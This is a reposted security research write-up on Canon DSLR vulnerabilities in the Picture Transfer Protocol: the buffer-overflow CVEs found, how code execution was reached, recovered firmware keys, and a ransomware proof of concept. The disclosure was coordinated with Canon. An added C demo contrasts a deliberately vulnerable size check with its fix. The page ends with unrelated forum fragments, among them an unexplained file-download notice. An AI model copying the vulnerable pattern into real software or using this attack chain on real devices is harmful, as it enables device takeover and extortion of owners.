Trying several decompression tools, such as Binwalk or 7Zip, produced no results, meaning that this is a proprietary compression scheme, or even an encryption. Encrypted firmware files are quite rare, due to the added costs of key management implications for the vendor.

Feeling stuck, we went back to Google, and checked what the internet has to say about this .FIR file. Here we can see the major benefit of studying a device with an extensive modding community, as ML also had to work around this limitation. And indeed, in their wiki, we found this page that describes the “update protection” of the firmware update files, as deployed in multiple versions over the years. Unfortunately for us, this confirms our initial guess: the firmware is AES encrypted.

As ML is open-source, we hoped that it would somehow publish this encryption key, allowing us to decrypt the firmware on our own. Unfortunately, that turned out not to be the case. Not only does ML intentionally keep the encryption key secret, we couldn’t even find the key anywhere on the internet. Yet another dead end.

The next thing to check was if ML ported their software to our camera model, on the chance it contains debugging functionality that will help us dump the firmware. Although such a port has yet to be released, while reading through their forums and Wiki, we did find a breakthrough. ML developed something called Portable ROM Dumper. This is a custom firmware update file that, once loaded, dumps the memory of the camera into the SD Card. Figure 2 shows a picture of the camera during a ROM dump.

Figure 2 – Image taken during a ROM Dump of the EOS 80D.

Using the instructions supplied in the forum, we successfully dumped the camera’s firmware and loaded it into our disassembler (IDA Pro). Now we can finally start looking for vulnerabilities in the camera.
Reversing the PTP layer

Finding the PTP layer was quite easy, due to the combination of two useful resources:

- The PTP layer is command-based, and every command has a unique numeric opcode.
- The firmware contains many indicative strings, which eases the task of reverse-engineering it.

Figure 3 – PTP-related string from the firmware.

Traversing back from the PTP OpenSession handler, we found the main function that registers all of the PTP handlers according to their opcodes. A quick check assured us that the strings in the firmware match the documentation we found online.

When looking at the registration function, we realized that the PTP layer is a promising attack surface. The function registers 148 different handlers, pointing to the fact that the vendor supports many proprietary commands. With almost 150 different commands implemented, the odds of finding a critical vulnerability in one of them are very high.

PTP Handler API

Each PTP command handler implements the same code API. The API makes use of the ptp_context object, an object that is partially documented thanks to ML. Figure 4 shows an example use case of the ptp_context:

Figure 4 – Decompiled PTP handler, using the ptp_context object.

As we can see, the context contains function pointers that are used for:

- Querying about the size of the incoming message.
- Receiving the incoming message.
- Sending back the response after handling the message.

It turns out that most of the commands are relatively simple. They receive only a few numeric arguments, as the protocol supports up to 5 such arguments for every command. After scanning all of the supported commands, the list of 148 commands was quickly narrowed down to 38 commands that receive an input buffer. From an attacker’s viewpoint, we have full control of this input buffer, and therefore, we can start looking for vulnerabilities in this much smaller set of commands.
Luckily for us, the parsing code for each command uses plain C code and is quite straightforward to analyze. Soon enough, we found our first vulnerability.

CVE-2019-5994 – Buffer Overflow in SendObjectInfo – 0x100C

PTP Command Name: SendObjectInfo
PTP Command Opcode: 0x100c

Internally, the protocol refers to supported files and images as “Objects”, and in this command the user updates the metadata of a given object. The handler contains a Buffer Overflow vulnerability when parsing what was supposed to be the Unicode filename of the object. Figure 5 shows a simplified code version of the vulnerable piece of code:

Figure 5 – Vulnerable code snippet from the SendObjectInfo handler.

This is a Buffer Overflow inside a main global context. Without reversing the different fields in this context, the only direct implication we have is the Free-Where primitive that is located right after our copy. Our copy can modify the pKeywordsStringUnicode field into an arbitrary value, and later trigger a call to free it. This looks like a good way to start our research, but we continued looking for a vulnerability that is easier to exploit.

CVE-2019-5998 – Buffer Overflow in NotifyBtStatus – 0x91F9

PTP Command Name: NotifyBtStatus
PTP Command Opcode: 0x91F9

Even though our camera model doesn’t support Bluetooth, some Bluetooth-related commands were apparently left behind, and are still accessible to attackers. In this case, we found a classic Stack-Based Buffer Overflow, as can be seen in Figure 6.

Figure 6 – Vulnerable code snippet from the NotifyBtStatus handler.

Exploiting this vulnerability will be easy, making it our prime target for exploitation. We would usually stop the code audit at this point, but as we are pretty close to the end of the handler’s list, let’s finish going over the rest.
CVE-2019-5999 – Buffer Overflow in BLERequest – 0x914C

PTP Command Name: BLERequest
PTP Command Opcode: 0x914C

It looks like the Bluetooth commands are more vulnerable than the others, which may suggest a less experienced development team. This time we found a Heap-Based Buffer Overflow, as can be seen in Figure 7.

Figure 7 – Vulnerable code snippet from the BLERequest handler.

We now have 3 similar vulnerabilities:

- Buffer Overflow over a global structure.
- Buffer Overflow over the stack.
- Buffer Overflow over the heap.

As mentioned previously, we will attempt to exploit the Stack-Based vulnerability, which will hopefully be the easiest.

Gaining Code Execution

We started by connecting the camera to our computer using a USB cable. We previously used the USB interface together with Canon’s “EOS Utility” software, and it seems natural to attempt to exploit it first over the USB transport layer. Searching for a PTP Python library, we found ptpy, which didn’t work straight out of the box, but still saved us important time in our setup.

Before writing a code execution exploit, we started with a small Proof-of-Concept (PoC) that will trigger each of the vulnerabilities we found, hopefully ending in the camera crashing. Figure 8 shows how the camera crashes, in what is described by the vendor as “Err 70.”

Figure 8 – Crash screen we received when we tested our exploit PoCs.

Now that we are sure that all of our vulnerabilities indeed work, it’s time to start the real exploit development. Basic recap of our tools thus far:

- Our camera has no debugger or ML on it.
- The camera wasn’t opened yet, meaning we don’t have any hardware-based debugging interface.
- We don’t know anything about the address space of the firmware, except the code addresses we see in our disassembler.

The bottom line is that we are connected to the camera using a USB cable, and we want to blindly exploit a Stack-Based buffer overflow. Let’s get started.
Our plan is to use the Sleep() function as a breakpoint, and test if we can see the device crash after a given number of seconds. This will confirm that we took over the execution flow and triggered the call to Sleep(). This all sounds good on paper, but the camera had other plans. Most of the time, the vulnerable task simply died without triggering a crash, thus causing the camera to hang. Needless to say, we can’t differentiate between a hang, and a sleep and then hang, making our breakpoint strategy quite pointless.

Originally, we wanted a way to know that the execution flow reached our controlled code. We therefore decided to flip our strategy. We found a code address that always triggers an Err 70 when reached. From now on, our breakpoint will be a call to that address. A crash means we hit our breakpoint, and “nothing”, a hang, means we didn’t reach it. We gradually constructed our exploit until eventually we were able to execute our own assembly snippet – we now have code execution.

Loading Scout

Scout is my go-to debugger. It is an instruction-based debugger that I developed during the FAX research, and that proved itself useful in this research as well. However, we usually use the basic TCP loader for Scout, which requires network connectivity. While we can use a file loader that will load Scout from the SD Card, we will later need the same network connectivity for Scout, so we might as well solve this issue now for them both.

After playing with the different settings in the camera, we realized that the WiFi can’t be used while the USB is connected, most likely because they are both meant to be used by the PTP layer, and there is no support for using them both at the same time. So we decided the time had come to move on from the USB to WiFi. We can’t say that switching to the WiFi interface worked out of the box, but eventually we had a Python script that was able to send the same exploit script, this time over the air. Unfortunately, our script broke.
After intensive examination, our best guess is that the camera crashes before we return back from the vulnerable function, effectively blocking the Stack-Based vulnerability. While we have no idea why it crashes, it seems that sending a notification about the Bluetooth status, when connecting over WiFi, simply confuses the camera. Especially when it doesn’t even support Bluetooth.

We went back to the drawing board. We could try to exploit one of the other two vulnerabilities. However, one of them is also in the Bluetooth module, and it doesn’t look promising. Instead, we went over the list of the PTP command handlers again, and this time looked at each one more thoroughly. To our great relief, we found some more vulnerabilities.

CVE-2019-6000 – Buffer Overflow in SendHostInfo – 0x91E4

PTP Command Name: SendHostInfo
PTP Command Opcode: 0x91E4

Looking at the vulnerable code, as seen in Figure 9, it was quite obvious why we missed the vulnerability at first glance.

Figure 9 – Vulnerable code snippet from the SendHostInfo handler.

This time the developers remembered to check that the message is the intended fixed size of 100 bytes. However, they forgot something crucial. Illegal packets will only be logged, but not dropped. After a quick check in our WiFi testing environment, we did see a crash. The logging function isn’t an assert, and it won’t stop our Stack-Based buffer overflow 😊

Although this vulnerability is exactly what we were looking for, we once again decided to keep on looking for more, especially as this kind of vulnerability will most likely be found in more than a single command.

CVE-2019-6001 – Buffer Overflow in SetAdapterBatteryReport – 0x91FD

PTP Command Name: SendAdapterBatteryReport
PTP Command Opcode: 0x91FD

Not only did we find another vulnerability with the same code pattern, this was the last command in the list, giving us a nice finish. Figure 10 shows a simplified version of the vulnerable PTP handler.
Figure 10 – Vulnerable code snippet from the SendAdapterBatteryReport handler.

In this case, the stack buffer is rather small, so we will continue using the previous vulnerability.

Side Note: When testing this vulnerability in the WiFi setup, we found that it also crashes before the function returns. We were only able to exploit it over the USB connection.

Loading Scout – Second Attempt

Armed with our new vulnerability, we finished our exploit and successfully loaded Scout on the camera. We now have a network debugger, and we can start dumping memory addresses to help us during our reverse engineering process.

But, wait a minute, aren’t we done? Our goal was to show that the camera could be hijacked from both USB and WiFi using the Picture Transfer Protocol. While there were minor differences between the two transport layers, in the end the vulnerability we used worked in both cases, thus proving our point. However, taking over the camera was only the first step in the scenario we presented. Now it’s time to create some ransomware.

Time for some Crypto

Any proper ransomware needs cryptographic functions for encrypting the files that are stored on the device. If you recall, the firmware update process mentioned something about AES encryption. This looks like a good opportunity to finish all of our tasks in one go.

This reverse engineering task went much better than we thought it would; not only did we find the AES functions, we also found the verification and decryption keys for the firmware update process. Because AES is a symmetric cipher, the same keys can also be used for encrypting back a malicious firmware update and then signing it so it will pass the verification checks.

Instead of implementing all of the complicated cryptographic algorithms ourselves, we used Scout. We implemented a new instruction that simulates a firmware update process, and sends back the cryptographic signatures that the algorithm calculated.
Using this instruction, we now know what the correct signatures are for each part in the firmware update file, effectively gaining a signing primitive by the camera itself.

Since we only have one camera, this was a tricky part. We want to test our own custom home-made firmware update file, but we don’t want to brick our camera. Luckily for us, in Figure 11 you can see our custom ROM Dumper, created by patching Magic Lantern’s ROM Dumper.

Figure 11 – Image of our customized ROM Dumper, using our header.

CVE-2019-5995 – Silent malicious firmware update:

There is a PTP command for remote firmware update, which requires zero user interaction. This means that even if all of the implementation vulnerabilities are patched, an attacker can still infect the camera using a malicious firmware update file.

Wrapping it up

After playing around with the firmware update process, we went back to finish our ransomware. The ransomware uses the same cryptographic functions as the firmware update process, and calls the same AES functions in the firmware. After encrypting all of the files on the SD Card, the ransomware displays the ransom message to the user.

Chaining everything together requires the attacker to first set up a rogue WiFi Access Point. This can be easily achieved by first sniffing the network and then faking the AP to have the same name as the one the camera automatically attempts to connect to. Once the attacker is within the same LAN as the camera, he can initiate the exploit.

Here is a video presentation of our exploit and ransomware.

Disclosure Timeline

- 31 March 2019 – Vulnerabilities were reported to Canon.
- 14 May 2019 – Canon confirmed all of our vulnerabilities. From this point onward, both parties worked together to patch the vulnerabilities.
- 08 July 2019 – We verified and approved Canon’s patch.
- 06 August 2019 – Canon published the patch as part of an official security advisory.
Canon’s Security Advisory

Here are the links to the official security advisory that was published by Canon:

Japanese: https://global.canon/ja/support/security/d-camera.html
English: https://global.canon/en/support/security/d-camera.html

We strongly recommend that everyone patch their affected cameras.

Conclusion

During our research we found multiple critical vulnerabilities in the Picture Transfer Protocol as implemented by Canon. Although the tested implementation contains many proprietary commands, the protocol is standardized, and is embedded in other cameras. Based on our results, we believe that similar vulnerabilities can be found in the PTP implementations of other vendors as well.

Our research shows that any “smart” device, in our case a DSLR camera, is susceptible to attacks. The combination of price, sensitive contents, and widespread consumer audience makes cameras a lucrative target for attackers.

A final note about the firmware encryption. Using Magic Lantern’s ROM Dumper, and later using the functions from the firmware itself, we were able to bypass both the encryption and verification. This is a classic example that obscurity does not equal security, especially when it took only a small amount of time to bypass these cryptographic layers.

Source: https://research.checkpoint.com/say-cheese-ransomware-ing-a-dslr-camera/
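The defect behind CVE-2019-6000 and CVE-2019-6001 in the post above is a size check that only logs. The following is an added illustration (not Check Point's or Canon's code) of that pattern next to the enforcing form; only the 100-byte message size comes from the post, while the handler names, the guard region and the frame layout are assumptions made for the demo.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added illustration, not Check Point's or Canon's code. It models the pattern
 * the post describes for CVE-2019-6000/6001: a fixed-size check that only logs.
 * Only the 100-byte message size comes from the post; every name, the guard
 * size and the frame layout are assumptions made for this demo. */

#define HOST_INFO_SIZE 100   /* fixed message size stated in the post */
#define GUARD_SIZE     16    /* stands in for saved registers / return address */
#define GUARD_BYTE     0xA5

/* One flat array models the stack frame: bytes [0,100) are the message buffer,
 * bytes [100,116) are the "guard" region a real overflow would clobber.
 * Keeping both in one array keeps the demo itself within bounds. */
typedef struct { uint8_t bytes[HOST_INFO_SIZE + GUARD_SIZE]; } sim_frame_t;

static void frame_init(sim_frame_t *f) {
    memset(f->bytes, 0, HOST_INFO_SIZE);
    memset(f->bytes + HOST_INFO_SIZE, GUARD_BYTE, GUARD_SIZE);
}

/* 1 if nothing was written past the message buffer, 0 otherwise. */
static int frame_guard_intact(const sim_frame_t *f) {
    for (size_t i = 0; i < GUARD_SIZE; i++)
        if (f->bytes[HOST_INFO_SIZE + i] != GUARD_BYTE) return 0;
    return 1;
}

/* Anti-pattern: the size is checked, but a bad size is only logged and the
 * copy still uses the length taken from the wire. */
static int handle_log_only(sim_frame_t *f, const uint8_t *msg, size_t len) {
    if (len != HOST_INFO_SIZE)
        fprintf(stderr, "SendHostInfo: unexpected size %zu (logged only)\n", len);
    memcpy(f->bytes, msg, len);   /* len bytes copied regardless of the check */
    return 0;
}

/* Fixed form: a wrong size is an error, the packet is dropped before any copy,
 * and the copy length is the constant rather than the wire value. */
static int handle_reject(sim_frame_t *f, const uint8_t *msg, size_t len) {
    if (len != HOST_INFO_SIZE) {
        fprintf(stderr, "SendHostInfo: unexpected size %zu (dropped)\n", len);
        return -1;
    }
    memcpy(f->bytes, msg, HOST_INFO_SIZE);
    return 0;
}

/* Feeds a constructed message of `len` bytes to one handler and reports whether
 * the guard survived. len is capped at the frame size so the demo stays safe. */
int guard_survives(size_t len, int hardened) {
    uint8_t msg[HOST_INFO_SIZE + GUARD_SIZE];
    sim_frame_t frame;
    if (len > sizeof msg) len = sizeof msg;
    memset(msg, 'A', sizeof msg);   /* constructed sample payload */
    frame_init(&frame);
    if (hardened) handle_reject(&frame, msg, len);
    else          handle_log_only(&frame, msg, len);
    return frame_guard_intact(&frame);
}

int main(void) {
    printf("log-only,  100 bytes: guard intact = %d\n", guard_survives(100, 0));
    printf("log-only,  116 bytes: guard intact = %d\n", guard_survives(116, 0));
    printf("reject,    116 bytes: guard intact = %d\n", guard_survives(116, 1));
    return 0;
}
```

The same check-and-return shape is what a patch for the battery-report handler needs as well: a length mismatch must end the handler, not just produce a log line.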
  44. 2 points
  45. 2 points
I think it would be useful to mention the city as well.
  46. 2 points
test@test.test sent you some files
1 item, 169 MB in total ・ Will be deleted on 30 July, 2019
Get your files
Download link: https://wetransfer.com/downloads/f1a7756d8ff3300a89da3a76b977064b20190723135146/e81e643cb5ace3adea53345997d661fc20190723135146/e35771
1 item: САЙТЭК.zip 169 MB
  47. 2 points
If you've also bought a good camera, you can take up video chat.